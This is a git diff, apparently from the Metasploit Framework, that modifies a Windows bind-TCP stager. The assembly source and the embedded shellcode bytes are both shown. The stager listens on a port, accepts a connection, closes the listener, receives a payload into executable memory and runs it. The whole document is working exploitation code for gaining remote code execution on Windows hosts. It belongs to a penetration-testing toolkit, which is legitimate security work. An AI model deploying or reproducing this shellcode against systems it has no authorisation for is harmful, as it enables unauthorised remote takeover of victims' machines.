diff --git a/external/source/shellcode/windows/stager_bind_tcp_nx.asm b/external/source/shellcode/windows/stager_bind_tcp_nx.asm index 9d9b9f0f67..07f0afff08 100644 --- a/external/source/shellcode/windows/stager_bind_tcp_nx.asm +++ b/external/source/shellcode/windows/stager_bind_tcp_nx.asm @@ -95,7 +95,7 @@ mov ebp, esp call LLoadWinsock %define FN_RECV [ebp + 24] -%define FN_SEND [ebp + 28] +%define FN_CLOSE [ebp + 28] %define FN_ACCEPT [ebp + 32] %define FN_BIND [ebp + 36] %define FN_LISTEN [ebp + 40] @@ -106,13 +106,13 @@ LWSDataSegment: ;======================== dd 0x190 ; used by wsastartup dd 0xe71819b6 ; recv [ebp + 24] -dd 0xe97019a4 ; send [ebp + 28] +dd 0x79c679e7 ; closesocket [ebp + 28] dd 0x498649e5 ; accept [ebp + 32] dd 0xc7701aa4 ; bind [ebp + 36] dd 0xe92eada4 ; listen [ebp + 40] dd 0xadf509d9 ; WSASocketA [ebp + 44] dd 0x3bfcedcb ; WSAStartup [ebp + 48] -db "WS2_32", 0x00 +db "ws2_32", 0x00 ;======================== LLoadWinsock: @@ -135,13 +135,15 @@ Looper: mov [esi + ecx * 4], eax ; stack segment to store addresses loop Looper +; Initialize winsock LWSAStartup: ; WSAStartup (0x101, DATA) sub esp, [edi] push esp push dword [edi] call FN_WSASTART xor eax, eax - + +; Create the socket LWSASocketA: ; WSASocketA (2,1,0,0,0,0) push eax push eax @@ -154,6 +156,7 @@ LWSASocketA: ; WSASocketA (2,1,0,0,0,0) call FN_WSASOCK mov edi, eax +; Bind to the specified port LBind: xor ebx, ebx push ebx @@ -165,20 +168,28 @@ LBind: push edi call FN_BIND +; Listen for new connections LListen: push ebx push edi call FN_LISTEN +; Accept the client connection LAccept: push ebx push esp push edi call FN_ACCEPT - mov edi, eax -LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE) +; Close the listening socket +LClose: + push ebx + push edi + mov edi, eax + call FN_CLOSE +; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE) +LAllocateMemory: push byte 0x40 pop esi push esi ; PAGE_EXECUTE_READWRITE=0x40 @@ -193,11 +204,12 @@ LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE) call [ebp+12] mov ebx, eax - LRecvLength: ; recv(s, buff, 4, 0) push byte 0x00 ; flags push 4096 ; length push ebx ; buffer push dword edi ; socket call FN_RECV ; recv() + +LExecuteStage: call ebx diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index 37d77f1667..26299f688f 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -1,5 +1,5 @@ ## -# $Id$ +# $Id: bind_nx_tcp.rb 5625 2008-08-11 22:51:28Z hdm $ ## ## @@ -26,7 +26,7 @@ module BindTcp def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', + 'Version' => '$Revision: 5625 $', 'Description' => 'Listen for a connection', 'Author' => ['hdm', 'skape'], 'License' => MSF_LICENSE, @@ -51,16 +51,17 @@ module BindTcp "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+ - "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49"+ + "\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49"+ "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+ - "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+ + "\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+ "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+ "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0"+ "\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53"+ "\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53"+ - "\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56"+ - "\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a"+ - "\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3" + "\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55"+ + "\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff"+ + "\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18"+ + "\xff\xd3" } )) end